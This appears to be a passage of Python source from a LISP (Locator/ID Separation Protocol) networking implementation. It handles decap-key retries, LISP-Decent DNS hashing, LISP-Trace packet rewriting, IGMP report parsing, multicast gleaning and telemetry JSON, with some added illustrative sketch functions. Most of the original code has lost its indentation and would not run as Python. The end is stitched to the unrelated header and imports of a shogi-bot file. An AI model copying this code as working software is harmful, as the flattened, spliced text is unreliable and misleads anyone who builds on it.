ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x instead. This is an expensive function, but it is
# rarely used, and once it has run for a particular addr_str it should not
# need to run again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
        # If the crypto-keys are the same, go find the next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
        # Try the ICV check. If it passes, switch to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod it by the configured LISP-Decent modulus value.
# We do an hmac-sha256() over a string representation of "[<iid>]<eid>", take
# the high-order bytes of the hash (6 by default, configurable via the
# LISP_DECENT_HASH_WIDTH environment variable), and do the modulus on that
# value.
#
# The key/seed for the hmac-sha256 hash is the string "lisp-decent".
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hmac.new(b"lisp-decent", eid_str, hashlib.sha256).hexdigest()
#
# Get hash-length to modulate from LISP_DECENT_HASH_WIDTH in bytes.
#
hash_width = os.getenv("LISP_DECENT_HASH_WIDTH")
if (hash_width in ["", None]):
hash_width = 12
else:
hash_width = int(hash_width)
if (hash_width > 32):
hash_width = 12
else:
hash_width *= 2
#endif
#endif
mod_value = hash_value[0:hash_width]
index = int(mod_value, 16) % lisp_decent_modulus
lprint("LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}". \
format(lisp_decent_modulus, old_div(hash_width, 2) , mod_value, index))
return(index)
#enddef
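#
# Illustrative sketch (not part of the original lispers.net code): a
# standalone version of the index computation above, showing how an EID
# string maps to a LISP-Decent index. The modulus value and EID string below
# are hypothetical examples; lisp_get_decent_index() uses the configured
# lisp_decent_modulus and the printed EID-prefix.
#
def lisp_example_decent_index(eid_str="[0]10.0.0.0/8", modulus=4, hash_width=6):
    import hmac, hashlib

    digest = hmac.new(b"lisp-decent", eid_str.encode(),
        hashlib.sha256).hexdigest()
    high_order = digest[0:hash_width * 2]
    return(int(high_order, 16) % modulus)
#enddef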
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is an address passed as a string. Build an internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
    # Display the port if the caller is an encapsulating RTR using a
    # translated RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["n"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["sr"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["n"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["sr"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed[0] + "ts"
entry[key] = lisp_get_timestamp()
#
    # If this is an ETR decap entry and the dest RLOC is "?", the packet came
    # in on lisp_etr_nat_data_plane() where the kernel strips the outer header.
    # Get the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["n"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["dr"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["dr"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["lats"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["se"] = seid
rec["de"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
    # Search for record. If we are appending the first ITR node entry, get its
    # RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["de"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["n"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["se"] = deid
rec["de"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
    # Otherwise, we are forwarding a packet that is about to be encapsulated,
    # or we are forwarding a packet that was just decapsulated with the
    # addresses swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["sr"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["n"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
    # The DF-bit could be cleared here (see the commented-out code below)
    # because we may have to fragment as the packet grows with trace data.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
# df_flags = struct.unpack("B", headers[6:7])[0] & 0xbf
# headers = headers[0:6] + struct.pack("B", df_flags) + headers[7::]
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
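#
# Illustrative sketch (not part of the original lispers.net code): the shape
# of the JSON array carried in a LISP-Trace packet as built up by
# lisp_trace_append() above. Every address, hostname, and timestamp value
# below is a hypothetical placeholder.
#
lisp_example_trace_json = [
    { "se" : "10.1.1.1", "de" : "10.2.2.2", "paths" : [
        { "n" : "ITR", "sr" : "192.0.2.1:60001", "dr" : "203.0.113.9:4341",
          "hn" : "itr-host", "ets" : 0 },
        { "n" : "ETR", "sr" : "203.0.113.9", "dr" : "10.2.2.2",
          "hn" : "etr-host", "dts" : 0 } ] }
]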
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mappings array to see if we should glean the EID and
# RLOC. Find the first match. Returns three booleans: the first is False if
# no configured glean mapping matches, the second tells whether the matched
# entry was configured to RLOC-probe the gleaned RLOC, and the third tells
# whether it was configured to send IGMP queries.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if ("instance-id" in entry):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if ("eid-prefix" in entry):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if ("group-prefix" in entry):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if ("rloc-prefix" in entry):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
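#
# Illustrative sketch (not part of the original lispers.net code): the shape
# of one entry in the lisp_glean_mappings array that lisp_allow_gleaning()
# matches against. The prefixes below are hypothetical; in the real array the
# "eid-prefix", "group-prefix", and "rloc-prefix" values are lisp_address()
# instances built by the configuration code.
#
def lisp_example_glean_mapping_entry():
    return({ "instance-id" : (0, 0),
        "eid-prefix" : lisp_address(LISP_AFI_IPV4, "10.0.0.0", 8, 0),
        "rloc-prefix" : lisp_address(LISP_AFI_IPV4, "192.168.0.0", 16, 0),
        "rloc-probe" : True, "igmp-query" : False })
#enddef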
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (seid_str in lisp_gleaned_groups):
if (group_str in lisp_gleaned_groups[seid_str]):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when the packet is an IGMP query and
# an array when it is a report. The caller must check whether it has context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR running as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0:1])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
    igmp = packet[header_offset::]
    if (len(igmp) < 8):
        lprint("IGMP message too small")
        return([])
    #endif
    igmp_type = struct.unpack("B", igmp[0:1])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
(igmp_type in igmp_types) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
    #
    # Parse each record for IGMPv3 (igmp_type == 0x22). For IGMPv3 the word
    # parsed above as the group address is really the reserved/record-count
    # word, so reuse it as the record count (the reserved high bits are zero).
    #
    record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
        if (len(igmp) < group_size): return(register_entries)
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (record_type not in lisp_igmp_record_types):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
            if (len(igmp) < source_size): return(register_entries)
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
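#
# Illustrative sketch (not part of the original lispers.net code): build a
# minimal IPv4 + IGMPv2 membership report for group 239.1.1.1 and feed it to
# lisp_process_igmp_packet() above. The addresses are hypothetical and the
# IP/IGMP checksums are left as 0 since the parser above does not verify them.
#
def lisp_example_igmpv2_report():
    import socket, struct

    src = socket.inet_aton("192.168.1.10")
    dst = socket.inet_aton("239.1.1.1")
    ip = struct.pack("!BBHHHBBH", 0x45, 0, 28, 0, 0, 1, 2, 0) + src + dst
    igmp = struct.pack("!BBH", 0x16, 0, 0) + dst

    #
    # Returns [[None, "239.1.1.1", True]], a (*,G) join.
    #
    return(lisp_process_igmp_packet(ip + igmp))
#enddef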
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC in the map-cache. This function handles
# both the source EID of a packet and any IGMP-reported groups in one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
    # Add the RLOC to a new map-cache entry or update the RLOC for an existing
    # entry.
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return a dictionary array if the json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if ("type" not in tel): return(None)
if ("sub-type" not in tel): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
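#
# Illustrative sketch (not part of the original lispers.net code): round-trip
# the telemetry JSON through lisp_encode_telemetry() and
# lisp_decode_telemetry() above. The timestamp values are hypothetical
# placeholders.
#
def lisp_example_telemetry_roundtrip():
    template = ('{ "type" : "telemetry", "sub-type" : "timestamps", ' + \
        '"itr-out" : "?", "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }')

    encoded = lisp_encode_telemetry(template, io="1700000000.000",
        ei="1700000000.100")
    return(lisp_decode_telemetry(encoded))
#enddef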
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if ("telemetry" not in lisp_json_list): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#
# lisp_mr_or_pubsub
#
# Test action for Map-Request or Map-Request with Subscribe bit set.
#
def lisp_mr_or_pubsub(action):
return(action in [LISP_SEND_MAP_REQUEST_ACTION, LISP_SEND_PUBSUB_ACTION])
#enddef
#------------------------------------------------------------------------------
|
lishogibot.py
|
import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
from multiprocessing import Process
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError, ReadTimeout
from urllib3.exceptions import ProtocolError
import os
from util import makeusi
